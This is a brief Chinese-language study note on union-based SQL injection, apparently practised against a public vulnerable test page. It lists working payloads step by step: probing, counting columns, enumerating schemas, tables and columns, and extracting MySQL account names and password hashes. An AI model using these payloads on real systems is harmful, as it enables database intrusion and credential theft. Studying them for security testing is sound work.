本文共 856 字,大约阅读时间需要 2 分钟。
测试点
https://webscantest.com/datastore/search_get_by_id.php?id=3
数据库 information_schema
columns表格 第二列是table_schema数据库名 第三列是table_name表名 第四列是column_name表格的列名
函数 group_concat 分组 concat 分组 distinct 去重
- 数字型 and 1=1 后 and 1=2
- 判断列数多少 and order by X
- 根据回显 判断基本信息 union all select 1,2,concat(user(),0x20,version(),0x20,database()),4 --
- 数据库名 union all select 1,2,3,group_concat(distinct table_schema) from+information_schema.columns--
- 表名 union all select 1,2,group_concat(distinct table_name),4 from information_schema.tables where table_schema=database()--
- 字段名 union all select 1,2,group_concat(distinct column_name),4 from information_schema.columns where table_name=hex(表名)
- 账户 union all select 1,2,3,group_concat(distinct user) from mysql.user;
- 密码 union all select 1,2,3,authentication_string from mysql.user where user=username;
#注 数据库mysql存放私有信息表格是user 里面含有用户私有内容
转载地址:http://szelf.baihongyu.com/